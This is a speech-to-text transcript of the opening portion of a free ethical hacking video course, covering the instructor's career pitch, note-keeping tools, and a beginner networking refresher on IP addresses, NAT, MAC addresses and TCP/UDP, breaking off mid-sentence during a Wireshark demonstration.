Back to notes

Transcript for:

hello everybody and welcome to this 12-hour edition of practical ethical hacking my name is heath adams and i'm going to be your instructor for this course a really quick who am i i am a husband ethical hacker teacher and when i have time gamer sports fan and animal dad i am the business owner at tcm security we are a cyber security consulting and education firm i do what is called ethical hacking meaning companies pay us to attempt to break into them it could be through a network wireless network a web application even physical pen testing like a building anything that they want us to try to hack into we're happy to do it and there's careers out here that involve ethical hacking it's actually a booming industry right now and a lot of people are coming into this industry from unique backgrounds like for example i was an accountant and i ended up in this industry and i've seen doctors dentists lawyers all kinds of random backgrounds that have just come to this industry and found homes here so if you're interested in ethical hacking this course is designed for you to kind of brush you into the basics help you understand what an ethical hacker does and some of the the techniques and it's going to be all hands-on i am not a powerpoint person whatsoever so this is the little bit of powerpoint that you're going to get at the beginning of the course and then we're going to get into heavy hands-on techniques so if you're interested in finding more out about me i am very approachable you can find me on linkedin on twitter here on youtube i would love if you hit the subscribe button comment uh hit the like let me know how you enjoyed the course and of course you can find me on twitch as well we do live streaming some ethical hacking streams some q a etc etc down below you see sites tcm security is the consulting side of the business the academy is the educational side and the certification side is the certification side so i'm going to cover that really quick and what this course is and what we're going to do in this course okay so welcome to practical ethical hacking this is 12 hours of 25 hours of a course so full disclosure this is not the complete course though this is a course that takes you through the first half and gets you to a good stopping point so reviewing the curriculum i'm going to scroll down here and i'm going to link everything in the description as well we're going to cover a few things in this course we're going to talk about note keeping we're going to go over computer networking and also python so if you've never used python or if you've never done anything with computer networking we're going to kind of cover that and so we'll cover some of the foundational skills before we get into ethical hacking and that does include note keeping and setting up a lab and installing linux and running through linux as well so we built all the foundations in this course before we start getting into ethical hacking so once we get through linux and python and we get through our computer networking we start getting into the ethical hacker methodology we talk about the five stages of ethical hacking and then we start getting into information gathering what information can we gather about our target we can look at social media we can look at finding email addresses finding intelligence about these companies or individuals or whoever it is that we are paid to target and we'll do that through information gathering and reconnaissance there's a bunch of different techniques that we can do then we'll move into the next phase which is scanning and enumeration we're going to have a intentionally vulnerable machine that's presented to us we're going to scan that with tools that you learn throughout the course identify what vulnerabilities might exist within the machine and then we're going to eventually start hacking it so we'll get into exploitation and talk about how we can hack a machine understand the basics of exploitation and then eventually hack a machine once that has all been said and done we're gonna go ahead and move into a capstone so we have uh four to five boxes actually five boxes that we have built ourselves and we allow you to download those you run through those and you try to attack those and your goal is to hack into these machines so you go through all these and that is your capstone your end to your 12 hours of your course now this is the only time i'm going to try to sell you anything is going to be the next 30 seconds to a minute if you are interested in continuing on with the course it does cover exploit development active directory which is probably the coolest thing ever it's my favorite thing to teach and how to hack into active director which you can see there's a lot of active directory attacks here we go into post exploitation we go into web application enumeration and the owasp top 10 web application attacks we do a little bit of wireless pen testing legal documentation report writing and career advice and we do sell all of our courses for 30 full disclosure we have about 12 courses at the time of this recording if we go to the home page we can see all of our courses here so we've got everything from linux and python all the way down to open source intelligence different types of pen testing and advanced pen testing mobile pen testing malware analysis phishing everything is no more than thirty dollars and that is the only time i'm going to sell you on anything again so last but not least we do have a certification side of things if you're interested in the certification this course it leads to the practical network penetration tester certification if you want to find out more about that and why that's cool and industry changing feel free to go to certifications.tcm dot and with that being said i am done pitching you selling you anything for the rest of this time being let's get into 12 hours of free material and start covering how to become an ethical hacker let's go ahead and get this course started before we dive into this course i want to talk about a day in the life of an ethical hacker and i want to talk about why i love ethical hacking or penetration testing and what i do on a day-to-day basis what kind of engagements you might find yourself in as an ethical hacker and then the soft skills and technical skills i think that you should have in order to be successful in this field so let's go ahead and first look at why pen testing so why pen testing why for me well i work from home i roll out of bed at like 7 55 in the morning i'll get my coffee ready i'll go to my desk i'll make it there by eight and i am ready to go i don't have to sit in traffic i don't have to drive to work i you know i save so much time out of my life just by working from home it's a great luxury i love the lifestyle it's not for everybody but a lot of penetration testing nowadays is working from home and another great thing about pen testing is the the salaries are incredibly high my first job in the field was over six figures meaning over a hundred thousand dollars in this field as a you know first-year pen tester uh so it's incredible money and it it's very lucrative moving up anywhere from uh a senior pentester can make a hundred and fifty thousand dollars a manager can make somewhere around 170 to 200 000 and really the sky's the limit especially if you go out and you do your own business or your own consulting uh the salaries are very very high because this is a very technical field and uh there there is a job shortage or people shortage right now we need we have more jobs than we have people so that relates to high salaries as well on top of that the benefits are great the work life balance is great again this boils down to where you work but for for me personally you know i'm working 40 hour weeks um my benefits are are have been fantastic through and through um and i just i love the lifestyle right that work from home that 40 hours a week i was an accountant before i got into penetration testing and let me tell you i was working 60 hour weeks seven hour weeks i was in the office at the all the time and i was you know i was going in when it was dark and i was coming home when it was dark and it just you know can easily lead to depression doing that i've not experienced any of that in penetration testing and i'm really really happy for it so on top of all this it is mentally stimulating this is one of the best fields i am what i consider a lifelong learner i like to learn i am non-stop learning right and i have that personality type and you're going to find that if you enjoy this field it's never going to feel like work to you i could sit here and i can pen test for 80 hours and it never feels like work to me it is just mentally stimulating it's a puzzle there's always something new to learn there's always a new attack out and there's always a new defense out as well so somebody's always trying to block your attacks and it's this cat and mouse game and if you do not stay up to date or on top of things you're going to get left behind so you have to have that mentality in this field where you're always willing to learn and you like learning and that's really like for me that's a positive to pen testing because i enjoy that and lastly of course it's legal breaking and entering who doesn't like that i get to break into buildings i get to break into websites into networks and people pay me to do it i cannot believe that this is a job when i first heard about it i was like no way hackers hackers are bad guys right but hackers can be good guys too and we can get paid very lucrative salaries so from here let's talk about a day-to-day lifestyle so day to day here what's guaranteed most basically should be guaranteed is that i roll out of bed i'm still relatively young and i have several different types of assessments that i can do and this really isn't all of them but this is the ones that i do the most now i have what is an external or internal network assessment and we're going to cover those quite a bit in this course but when we're talking external network assessment that means that i'm evaluating a network from the outside i could be i could be in china i can be the united states i could be in russia it doesn't matter where i'm attacking from right i can be in any country at any time attacking this network so i'm on the outside looking in the internal is different we assume at this point that we have breached the network we have a dropbox we've got some sort of code execution on their network we logged into their vpn it doesn't matter somehow some way we're on that network what can we do once we're inside the network and what that means is we're going to be talking a lot about active directory pen testing and that's really what it corresponds to and this course is going to hit very very heavy on active directory because of this and uh so you have two different types of network pen tests and they the methodology is very similar the attacks and tool sets are very different so they can almost be split apart into their own subsections but you will have external pen tests internal pen tests on the network side you may be asked to do web application penetration testing so that is assessing a website right you you have a website or an application that is given to you and you want to see if you can break that website if you can log in as an administrator or get somewhere that you you shouldn't be able to get to and you just want to evaluate the security posture of that website so there are a lot of tools and methodologies out there for that and we're going to cover the owasp top 10 in this course when we talk about that which is big when it comes to testing web applications so from there we also have what is called wireless penetration testing that is the evaluation of a wireless network so we'll go on site we'll try to hack into the wireless we'll look at the guest network and see if there's any segmentation or not should a guest be able to sign in and access the same network that somebody who is logged in as an employee should access the answer is no but it happens quite a bit we'll also look for rogue devices and see you know what might be out there that is interesting to us we'll talk more about all these different assessments when we get into their respective sections now there's also what is called physical or social or fishing there are three different types but they fall into social engineering now physical assessment is where you go on site and you try to break into a building you have a destination in mind maybe it's a server closet or you know some some critical location the building that they don't want you to get into this could involve picking locks social engineering a lot of the time uh cloning badges you know and just making your way into this building through whatever methodology you can now social engineering uh and fishing those are you know kind of hand in hand you'll do a phishing campaign or social engineering campaign or even a fishing where you're calling on the phone and you're trying to get information and you're just after you know what kind of credentials can i get who clicks on my links what kind of passwords do i get etc we also have what is called sock assessment so a soccer assessment is also known as purple teaming and purple teaming is when you combine red and blue so as a penetration tester or ethical hacker you're often known as red and a defender is often known as blue so you combine those and that makes purple and what that means is we'll sit down with a blue team as an offensive team we'll sit down with the blue team and we'll say hey what attacks do you want us to try to run or we're going to run these attacks and i want to know if you pick it up so i might run a specific attack and see if the blue team detects it i might go plug into their network and see if it prevents me from plugging into their network do they get an alert on that if not how can we help them baseline this attack to get this alert so i think purple teaming assessments are some of the best assessments that are out there because not only do they learn from you and what attacks are out there but you learn from them on how to defend against these and how to bypass these two because maybe your first attempt does get blocked and you're like hey maybe i should you know run a different attack and see if you catch that and it's a great way to have that cat and mouse game again so once we do these types of assessments we have to write a report we have to report back on what we saw and tell the client about it and i put a little sad face there because you know not everybody likes writing reports but it is absolutely part of the job you have to be well written in this field to be successful so you know you write this report and you're gonna have to present this report to a client and that's what is the debrief now debrief is where you take the report and you give it to a client and you walk through it with the client and say here's what's wrong here's why it's wrong and here's how we can fix that for you or here's how you can fix that right and so you have to have this technical skill set as a penetration tester and you have to have this well-written skill set you have to be able to write well you also have to be able to talk in front of people when it comes to doing debriefs and talk to people that doesn't mean you have to be an extrovert by any means you can be an introvert i am very introverted but you have to be able to put that personality on when you're on site same thing with the the physicals by the way if you're on site for a physical you do not have to be an extrovert to be successful i know plenty of good physical pen testers that are actually introverts and do just fine as long as you're able to get into that mindset for that temporary time period so anywhere from all these different assessments that you could end up doing at any given time you have to be well-rounded there you're going to be writing reports and you're going to be presenting reports to clients now let's talk about the technical skills that you are going to need and our course here is going to cover a lot of these so at a base level you really do need to know linux preferably kali linux or what another type was called parrot there is networking that you should know you should be familiar with the osi model certain protocols like tcp udp http etc you should have good scripting skills whether it be python scripting or bash scripting etc there and you should have a solid hacking methodology and this is all what we would want as a base for an interview you should have also tool familiarity right metasploit burp suite nessus if all this sounds like a foreign language to you that's fine come back and watch this video again once you've gone through the whole course and it's going to all click for you and you're going to say hey i know a lot of this and on the preferred side active directory is huge if you know active directory you're going to be ahead of the game most people when i interview them they have a good base but they don't have that good preferred side and we like we like the preferred column a lot okay so active directory super important wireless attacks important to know the owasp top 10 also important to know that is related to web application penetration testing and lastly coding skills so scripting and coding a little bit different scripting is what you'll be using primarily coding you don't have to be a coder to be successful in this field at all by the way if you only script for the rest of your life in this field you'll still find plenty of success however you can code new tools things you know contribute to the community with it we'll talk about that here in a second as well but just know that the base is possibly potentially can get you into a job to prefer it will definitely get you into a job if you have strong knowledge on that side along with the base knowledge lastly something that is not covered uh much is the soft skills that you need to be a pen tester so yeah it's great to be technical and we already talked about the the social people skills right because you're going to be doing that debriefing you might be doing social engineering etc and you're going to have to have that well-written ability to you as well but let's talk about some of these other ones you need a strong desire to learn you should be the type of person or that personality type that always wants to learn we talked about it right where you should be the guy or girl that wants to go home and study and you find this fascinating and you that desire to learn is going gonna benefit you because of that cat and mouse game because you know something that you knew yesterday might not be an exploit today you know patches are coming out all the time and you have to stay ahead of the game because of this cat and mouse game so that strong desire to learn super important if you do not stick up with your studies you're gonna get left behind and most people have this desire to be in the field of ethical hacking because they think it's sexy it sounds cool and is cool but if you do not have that desire to learn you do not have that that perseverance which we're going to talk about you're going to get left behind in this field and you're not going to be successful so let's move over to perseverance you have to have this perseverance mindset not with just that desire to learn but also that ability to not give up because the answer is not always there in front of you and you're going to see this as we go through the course it's not cut and dry it's not hey i scan for this i see an exploit i go exploit it you might have to do a lot of research it might look like the machine that you're attacking it has no exploits available to it and you have to be able to put in that persistence to be able to persevere you have to have that mindset where i'm not going to give up i'm going to keep trying at this until i have exhausted all my potential resources that is what makes a good hacker okay that mindset of i'm not going to quit really makes a good hacker now on top of that non-complacency this kind of falls into that strong desire to learn now i've had co-workers that are completely happy when i was working help desk when i was working in networking plenty of co-workers who are happy with their jobs they've been in the same position for five years 10 years you cannot be that person if you want to be a pen tester you always want to learn more you always want to move up you want to you want the most out of yourself okay don't be complacent if you're complacent you're going to get left behind just i'm beating the dead horse here but it really is true like you're going to get left behind if you're not constantly studying and if you stay complacent lastly you should have a blog or twitter or github or something that you contribute back to the community with it could be a youtube channel or twitch stream or however you want to do it right you should give back to the community when i see that somebody's giving back to the community on their resume even if it's a blog post or twitter whatever it really helps uh and things that you're gonna get asked in interview include where you get your news from or and how do you you know do you have a blog you're going to be asked that you know and twitter is a great place to get get news and a blog is a great place to give back and twitter is a great place to give back too so make sure you're contributing to your community it'll really help you in the long run and you don't have to reinvent the wheel it could be a blog that somebody's posted before or 20 people have posted before as long as you're posting it and your it helps you learn and it helps your style might be something that helps somebody else learn as well compared to the other blog posts where maybe people didn't like that writing style or they don't like that you know commentary or however it is so you never know how your content is going to help somebody else so i always encourage people to go out there and make their own content so that's it and i know this is a long video this is going to be longer than most the videos but i wanted to dive in and really cover what you can expect as an ethical hacker and what you need really at a technical and a soft skill level to be successful so from here we're going to go ahead and get right into the course next up is effective note keeping we're going to talk about the importance of note keeping what tools you should use to be keeping notes for this course and then we're going to dive right into the technical concepts so i'll catch you over in the next video so before we begin in this course and we really start to dive in it's important to cover one of the topics that i'm going to harp on the most which is effective no keeping if you're going to be successful in your career and you're going to be successful in this course you really need to take good notes now in this first video i'm going to show you what my notebook kind of looks like not only for my personal notebook but as a notebook for an assessment and how i might take notes for an assessment and then i'll also show you some note keeping applications that i prefer or i've heard students prefer in the second video we're going to cover how to install one of the applications and another cool application used for taking screenshots so let's take a look at my notebook first so here is my notebook and actually let's click over here so this is my notebook and you can see it's really long it's got all kinds of stuff in here and it's just something that i build upon this one in particular is actually only geared towards active directory so i have a few different notebooks this one is active directory and it's actually a few different courses that i've taken in the past that i've kind of put together and then just for assessment work etc i just kind of have a little cheat sheet here so i wanted to show you this one in particular because these were built off of courses and you're going to be working through a course so kind of just get an idea of how maybe to structure it so here you can see i structured it and i've got different modules here where okay module one might have had this email macro fundamentals module two two here has all these different uh components to them right and we have we have other notes then we have child notes and even sub children to those child notes and i'll show you how to create that here in a second but let's say for example enumeration which is one of the most important things that you're going to cover in hacking and we take a look at enumeration you don't have to understand what any of this means here but you could see if i want to look at a domain and i want to get the current domain that i'm on here's the command i run and here is a picture of what it looks like and here's what comes back when you run that command that's great that's what i want to see and i have a whole list of commands for all these in here right so if i'm confused on a assessment and i want to go and find a command that i'm not sure of i can go to my little cheat sheet here now again this is really long so you have to create your notes the way it really helps you for a course i think it's good to write it all out step by step like this and then go back and make a cheat sheet i don't need those pictures anymore i've been doing this for a while so maybe i just say hey get current domain is git net domain and then i say hey okay get object of another domain here's an example of it i don't need the pictures because it makes it really long but as an example and over time you learn with the pictures as well at least i do so let's build from that here is an example of an actual assessment that i did for a client and you can see how i did this now i did an external internal and web application assessment for this client and these were the findings now i'm only going to show you what is master obfuscated already or doesn't reveal client information but as you can see here one example is on the internal they had something called smb signing disabled you don't need to worry about it but here in my picture i've got a nice picture the picture has highlighted it says hey message signing disable that signifies smb signings disabled and it has the ip address so we identify the machine and we give proof of concept that this smb signing is disabled here another example ms-17010 these are both internal exploits that you're going to encounter in this course here's one i check this machine it says hey this target's not patched now this is one i didn't exploit but it shows that it's actually vulnerable to this attack so these are a couple screenshots that i'll put now your notes could be different than mine how i organize is i take a screenshot i put it in here and then i make sure that i have at least the ip address and the screenshot for reference because i'll remember it but if you need to go in here and take detailed notes that's absolutely fine as well you always want good notes for your assessments because you never know if a client's going to come back in six months or even a year and say hey what was that one thing that you did here and if you go back to your notes you say oh you know i did this and some people get down really into the weeds they have dates times everything for step by step what they do on an assessment and that's completely up to you and how well you take your notes this is kind of how i lay it out and then you see the green check marks next to it i add those green check marks when i'm doing my report so as i'm building my report out and i cover something in the report i'll just go ahead and right click and i'll change the note icon to a check mark meaning that i've written that part of the report for that finding and we just kind of go through over time so with that being said i do want to show you some decent applications the one that i'm using here and that you see is called keep no now i run on windows as a base so keepnote.org that's how you get keep note it is for linux it is for mac osx but this is totally a preference thing me i prefer i've been using it for a long time some people don't like it okay so i'm going to offer some alternatives as well cherrytree comes built into kali linux as you're going to see here in just a little bit worth looking at worth trying seeing if you like it onenote's another example if you use microsoft and if you're a mac user a lot of students have told me that joplin is really good now i've never used this but i keep hearing great things about it so what i'm going to do is i'm going to put all of these into the course resources and you'll be able to look at them download them decide on your own now you're not limited to these four note keeping applications by any means feel free to use whatever you like to take notes if you want pen and paper that's great as well and so just make sure that you're taking good notes and we're gonna we're gonna harp on this throughout the entire course over and over and over again so make sure you're taking good notes so from here what we're going to do is we're going to install keep note in the next video and we're going to install an awesome tool called green shot i'm going to show you what green shot does and why it's so cool and i cannot live on any assessment without it so let's catch you over in the next video when we work on installing those tools alright so in that example in the last video we talked about using keep note so if you go to google and you type in keep note all you got to do is come here and keep note works on windows linux and mac os x so great great tool the only issue with this tool is it has not been updated in a long time some people find issue with that if you're one of those people i'm actually not you can use other tools one note is an option cherry tree is also an option you can also find other options out there for you if you have a favorite note taking tool already that's absolutely fine as well just make sure to take good notes especially during this course and make the most of it learn all the things that you can and incorporate that so i will show you quickly how to install keep note here and another thing to note too is while we do this is cherry tree is available on kali linux we're going to install kali linux here very soon so once we install kali linux and we get into the introductory linux when we explore it i'll show you a little bit more of cherry tree and what that looks like and we'll talk pros and cons of cherry tree when we get there so here we go if you are on windows you can follow along or you download your appropriate one here depending if you're on linux or if you need mac as well so i'm going to go ahead and install the exe and i'm just going to actually run this we're just going to say yes and i'm going to say next next install and that's it that i mean it's that quick and then we just launch keep note and here you go we've got keep note so the other tool the really cool tool that i love this one is called green shot now this is a screenshot capturing tool so let's go to downloads here on green shot if you are running on something other than windows you're going or windows or mac so basically linux you're going to need a different tool the recommended tool that i've heard out there is called flame shot f f-l-a-m-e though i have no experience with it i've heard it is identical to green shot so here i'm going to download the latest stable i'm going to select run yes okay accept the agreement give away our firstborn next next next place it however you want i'm just going to next through everything and i'm going to start green shot with windows start that is my preference i love this tool again so it's finished all right let's take a look at it so it should be running let's start green shot now okay now you see it running down here on the bottom okay let's let's go let's open up a web page let's say we want to take a screenshot of something now you just hit your print screen button and this nice cursor gets brought up here and let's say we wanted to take this downloads part right here we're going to capture this and now we have choices we can just save the image that we just grabbed uh or my favorite is that we can actually open an image editor right so let's open this in their image editor look at this okay so here's the picture we just grabbed right on top of this really great tools let me show you two that i use always so i come into effects i put a border on it let's say that you have like a kali linux and kali linux if you've never used it has a black terminal it's really nasty so let's imagine here that it's black it's nasty when it comes to reporting so let's imagine that we're in this situation and we're writing a report and we've got this black background similar to this well you can see what i just did i just inverted it and i do this for all of my reports i invert the cali background so that way it's white and that way it looks nice on a report and when we get into the reporting you'll kind of see what that looks like but i like a nice clean background it saves on ink as well if they were to print it and it's just nice and neat when you give it to a client so i always invert my images if i need to you've got the black border here another thing is let's say you want to point something out you saw in my keep note notebook that i had a highlight you can just click that button up here and just highlight something like right here great another tool that's in here is this obfuscate so let's say that there's like a password or something really sensitive in here that that you don't want the client to see or you don't want to be reveal on a final report you can do that and then you can just like up the pixel size on this and make it really blurry you know so it's a really really great tool and then when you're done you can copy it to your clipboard you can save the file i just usually like copy this and if i want to go paste it like you know make a new notebook or whatever i'll just paste it in my keep note and just kind of go from there so again fantastic tool awesome to use if i had two recommendations for your note keeping it's keep note and green shot if i had to make one recommendation of the two it's absolutely green shot you can be flexible on your note keeping tool so again hopefully this helps you again again again please do take good notes of this course you're going to find yourself wanting to know hey what was that command i ran again and because we're going to go through so much stuff by the time this is all said and done that you're going to want to remember it so please take good notes so from here let's go ahead and move on into our networking refresher and we'll catch you in the next video hello everyone and welcome to this section on networking so this section is titled networking refresher meaning that some of you might have a networking background and if you're looking at this list that's on the screen and you go down the list and you say yep i know all those you can feel free to skip this section if you've taken some of these in the past and you just might want a little bit of a refresher on them then this section is for you we're going to cover these topics not totally in depth but we're going to use it as a way to brush up and then we'll hit on networking again when we get into introductory linux so if you are unfamiliar with things like tcp udp and the three-way handshake or if your subnetting is a little shaky or you don't know what the osi model is chances are you should probably stick around and just click through this series watch it and build that foundation remember we talked about one of the core foundations of pen testing being a strong networking background this is a good way to build it up remember what you might have forgotten and go from there so let's go ahead and just jump right into the first video which is going to be ip addresses what's up everybody so i'm gonna preface this video really quick with that it is raining pretty hard here so if the soothing sounds of the rain put you to sleep during this video and you can hear it i'm very very sorry but the show must go on so what we're going to be doing today is we're going to be talking about ip addresses now if you've ever used a computer before and you're any anyone familiar with it you probably know what an ip address is but i want to take this a little bit deeper in in theory on why we use ip addresses what types of ip addresses are out there and talk more about protocols and how i p addresses are actually designed and made up so i'm here in a cali terminal and i'm just going to type in a simple command and that command is ifconfig now if you've used linux before this might be familiar to you if you use windows it's similar to ipconfig all i'm trying to do is bring up my ip address so we can see here is that we have an ip address which is our inet this is my ip address here i also have another iep address this inet 6 this is what's called an ipv6 address so we've got this inet which is considered an ipv4 in this inet 6 which is considered an ipv6 now you can notice right away that there's two different types of notations for these this inet here is in a decimal notation and the ipv6 is in a hexadecimal notation we'll get to the importance of that in just a second so when it comes to ip addresses this looks probably pretty familiar to us this is an iep address this is how we communicate we communicate over layer three and you're gonna hear me talking about layers repeatedly throughout the course or at least throughout this part of the course so that we can get familiar with how we're actually doing this so i want you to be familiar with troubleshooting these layers and these layers all refer to something called the osi model so when we talk about layers we think about the osi model and i'll introduce the osi model here in a few videos and it should all click once i introduce the osi model so if i brought in the osi model up front it might be boring might not make sense so i'm going to introduce the osi model near the end and you're going to say hey yeah that all makes sense so what we've got here is we've got this ipv4 address and this is the most commonly used format that we use today right we use ipv4 for mostly everything and again this is in that decimal notation so when we see this decimal notation it's just a realistically a bunch of ones and zeros that are put together so that we have this human readable format realistically all we're seeing here with 192 this first this first section here this first octet is actually just a bunch of ones and zeros it's eight bits so we've got a range of eight ones and zeros here we've got another eight here eight here and eight here so when it's all said and done this inet or this ipv4 is made up of 32 bits eight plus eight plus eight plus eight here and which equals four bytes so another way to think about that is to think about it as say something like this one two three four five six seven eight period okay that is one section there so we've got eight ones that can make up this and then we'd have another eight etc i'm not going to beat a dead horse here but i do want to give you guys another example so if we go into our applications and we go to a text editor really quick so the way this looks is something like this we start with a number like 128 i'm going to try to space this out as best as possible and all i like to do is think of 128 as my base and this will make a lot more sense when we get into subnetting so please if you're confused by this don't worry this is all theory right now when we get into subnetting and we get hands-on it'll make a lot more sense i promise you so let's say we have ones and zeros here if we have a one for each of these sections and i'm going to space this out again as best as possible it's not pretty but if we have a one for all these this equals 255. why does this equal 255 well you take this and all these numbers add up 1 plus 2 plus 4 plus 8 all this adds up to 255. so let's say if we didn't have all ones and zeros we had just some ones enabled like these last three here okay well this would equal seven because we have four plus two plus one equals seven so our first number or whatever number this applied to in the octet would be 7. so if we had 7.7.7.7 it would just be this numbers repeating over and over these numbers repeating over and over right so b000111.0001111 and so forth so this is kind of what it looks like behind the scenes because again a computer is just ones and zeros we're all binary so what we're going to do is we're going to close this out we're going to talk a little bit of other theory when it comes to this and why inet or ipv6 and why ipv4 so let's close this and let's talk about ipv4 so i'm going to bring up a calculator and with ipv4 we have these 32 bits so what we can do is we could take 2 to the 32nd power and this is the possible amount of iep addresses that we could have so we have somewhere in the 4 billion range of ip addresses well spoiler alert we don't have only 4 billion people on earth right we're up to 7 something billion at this point and all these iep address spaces are gone so ipv4 has been around since 1981 nobody thought we were ever going to use all these addresses computers weren't really a thing who knew that we were going to want all these addresses and you know these companies started buying them up and they started buying them up in large chunks and then they sold those to isps and then isps sell those to you and so these ip addresses have been gone for a very very long time and chances are when you when you have an ip address and you get this ipv4 you're only going to get one if your corporation you might buy it more but we've run out of ip address space there's just not enough to go around so the theory is okay let's come up with something different let's come up with ipv6 now this hexadecimal is actually in 128 bits which makes things just a little bit longer and adds quite a bit so let's take this 2 to the 128 power and we get a number that i cannot tell you how to say not even going to try but i can guarantee you that in our lifetime we will never use this address space so we've come up with a solution of ipv6 but nobody really uses it ipv6 is just a thing that's that's there but when we get ipv6 addressed as a sign but still to this day everybody's using ipv4 well how how is that possible if we're using ipv4 but we're out of address space well think about this we're using something called nat which is network address translation now let's think about your network so you might have a cell phone or computer or multiple devices my network has at least 20 devices on it i've got i've got cameras i've got multiple cell phones smart tvs uh everything that connects to my internet gets an ip address and that's 20 ip addresses right there right so let's say i have 20 devices that's 20 ip addresses am i taking up 20 ip addresses out of that 4 billion no we're actually using something called network address translation or it's called nat for short and we'll talk about this again when we we set up our actual lab but with nat what we're doing is we're assigned these private ip address spaces so we've got this 192.168.57.139 now if you've ever seen a ip address before and you've been on a network good chances are it probably started with 192 or maybe it started with a 10 dot or something along those lines and that's because those are private i p addresses so anything that starts with 192 168 is not an ip address that is going to be out in the the interwebs it is going to be an ip address that is only known to you these are called private iap addresses so because we use these private ip addresses we can pass them out through what is called a public ip address now to make better use of this let's go out to firefox and i've already got a tab open so i went to google and i just said private i p addresses and i click the second image here because i think it's a great image so if we look at this there are classes of iap addresses private ip addresses now there is a class d and e we're not going to worry about those the big three are class a b and c if you know these you are good to go so if we look at class c this is what the most common household and small business use so we see it starts at the 192.168.0.0 so the 192 168 are constant if you see a 192 168 address you can guarantee yourself that that is a private ip address space and then we have the range of changing this number between 0 and 255 and this number between 0 and 255. why 0 to 255 well that'll all make sense when we get into subnetting but what that allows us to do is have a large number of networks here and a small amount of hosts but for a a regular user like uri or a small business 254 hosts is pretty good i mean i'm only using like 20 in my household so the most common household is probably using this 192 address but what about a big big business right something huge okay well they might use a 10 address because a 10 address frees you up to anything after this 10 is private so 10.1 10.1.1.1 whatever you want to put in here up to 255 on each octet makes for a small amount of networks but a large amount of hosts okay and don't worry about the host versus network thing again subnetting we'll talk about that it'll all make sense but just imagine the amount of amount of hosts that you can put in here with this wide range so because of this you'll see larger corporations using 10 addresses you'll also see a lot of corporations even small businesses using 10 addresses the the matter of fact is as long as you have this private ip address you're good to communicate across your network so any ip address outside of these and the loop back here are free game for the public address space they're probably already owned and you purchase those or rent those really from your isp your internet service provider so going back to this thought we have a class c address my network's class c 192 168 57 139 here so it falls into that class c i've got all these devices on this 192.168 network all these devices are talking out of one ip address that is my public ip address that is what i rent from my isp and all this network traffic goes out one ip so this is how we have achieved or solved the issue of running out of address space without having to use ipv6 not that there's anything wrong with ipv6 uh it's not pretty i mean it's way easier to type this stuff in than it would be to type something like this in um but at the same time this is how we've solved it we've we're able to still use ipv4 in mostly all networks and we are able to communicate out with this quote unquote iep address shortage so hopefully that makes sense we're going to build upon these concepts again ipv4 ipv6 ip addresses are layer 3 protocols layer 3 is a router so when we route traffic we route via an ip address so we're going to build upon that as well as we go in hopefully this is all just a refresher to you so that is it for this video i'll go ahead and catch you over in the next one all right so we're gonna move down a layer here and talk about layer two so remember ipv4 ipv6 ip addresses as a whole that is layer 3 we're talking about routing here in layer 2 we're going to be talking about a mac address or a physical address now mac stands for media access control and that is identified here in our ifconfig as this ether here so we can think of this as our physical address and a way that we communicate when we are using switches switches communicate over this physical address this is kind of how they know what device is what so what we say here is if we have a device say you just built a computer and you're installing your network interface card or your nic you're going to plug that in and you're going to have a mac address for that nic your cell phone that's going to have a mac address anything that's using a network interface is going to have a mac address so these mac addresses are important because they utilize layer 2 or switching and they are how we communicate over switches now there's something to be noted briefly about mac addresses now mac addresses have identifiers so as you can see here this mac address has six different pairs of two right and what we can do is we can take the first three pairs and we can just copy this and we can go out and we can try to put it into a mac address lookup now for this one this is just going to be vmware i'm not sure if it's actually going to come up but i'm going to go ahead and paste it and see what happens and you can see that the vendor actually shows up as vmware so the first three pairs here are identifiers and we can identify what we're up against if you've ever looked in your house and you've looked at your network and you you're trying to find a device and you see the ip address but the ip address doesn't really help you identify it you might see something along the lines of a mac address because your your home device say your your router might also be what's called a layer 2 slash layer 3 device meaning it's doing switching and routing for you and it'll also know the mac address of that device so you can take the first three pairs here put those into the google machine and see if you can identify what that device is so if i was unsure this didn't have a hostname or device name and i could just reach out and say okay well let me let me look these up maybe it'll give me an ink link it's not going to tell me the exact device but if i know it's running vmware then i can say oh you know that's my host machine running or if it's related to like texas instruments or something maybe i know that device in my house so this is just a quick way to look up devices and know about them the other option or other thing that you need to know here is just that again mac addresses layer two related to switching i'm just trying to repeat this and get this into your head so that's all we need to know from this lesson and we're going to go ahead and i'll catch you over in the next lesson all right so now we're moving into layer 4 which is the transport layer of the osi model and we're going to talk about what is tcp and what is udp so we'll type that in here tcp vs udp so tcp is what is known as the transmission control protocol and you could think of that as a connection oriented protocol and we also have udp which is the user datagram protocol and this is a connection less protocol so when we have these two protocols one is best suited when it comes to high reliability that's tcp tcp is connection oriented we want to make a connection we need high reliability so you can think of something like a website which is http or https or you can think of something like ssh or ftp the file transfer protocol those all utilize tcp when you think about udp you might think about something like a streaming service that's connectionless or dns is connectionless or voiceover ip is connectionless and when this comes into the importance of scanning scanning is super important we're going to be scanning both tcp and udp as a penetration tester and don't worry about scanning right now when we get into the scanning section this will make a lot more sense but we need to know what tcp and udp are and define them broadly so the most commonly commonly used protocol that you're going to be scanning is going to be tcp now tcp works on what is called a three-way handshake now if we look at the three-way handshake it's going to look something like this we're going to first send out a syn packet and then we're going to receive back a sin act packet and finally we're going to send an act packet now how does this work now you could think of this as an interaction so let's say you have a friend or a neighbor and you go to your neighbor and you say hello that's a sin now sin act is going to be the response it's going to say hey sin i acknowledge you that's your neighbor waving hello back and then you know you are good to go start a conversation so that's the acknowledgement now when we think about this in the terms of ports now port is a item that can be open on a machine it's a way to communicate with certain protocols for example if you think about http that's over port 80. if you think about https that's over port 443 there's a lot of different protocols and there are 65 000 plus ports that can utilize these protocols so everything related here is has to do with these ports now let's say that you want to connect to port 443 on a website you're going to send out a syn packet to that website you're going to say hey i want to connect to you on port 443 and if 443 is open and available for connection they're going to say hey you can go ahead and connect to me and when you want to actually establish that connection you're going to send that acknowledgement packet back now let's make more sense of this let's go ahead and open up a tool called wireshark so this is built into kali linux i'm just going to type in wireshark and i'm going to provide an ampersand here just so i have shell access if i need it in the background and all i'm going to do is capture packet data so this is going to be listening in on my nic and it's going to say hey what's he doing let's capture all that data so we're going to capture that i'm going to start a capture here you're going to start to see a bunch of traffic coming through you can see the different protocols here you can see udp is coming through right now but we're going to go establish a tcp connection so let's go out to the world wide web and i've got google up i'm just going to refresh google you're going to see a lot of traffic start coming through so i'm going to go ahead and just stop this right here look at all the data packets that get sent when you're using your computer this is what's going on in the background you don't even think about it so we could see some sin synax there those are in the gray let's see if we could find a good one okay so here is one right here um so what we're going to do actually let's find a better one so we're going to come down to here and we're going to say okay so here we are we're our source ip this is 192 168 57 139 we're going out to destination of 74 125 21 155 we're saying hey i've got 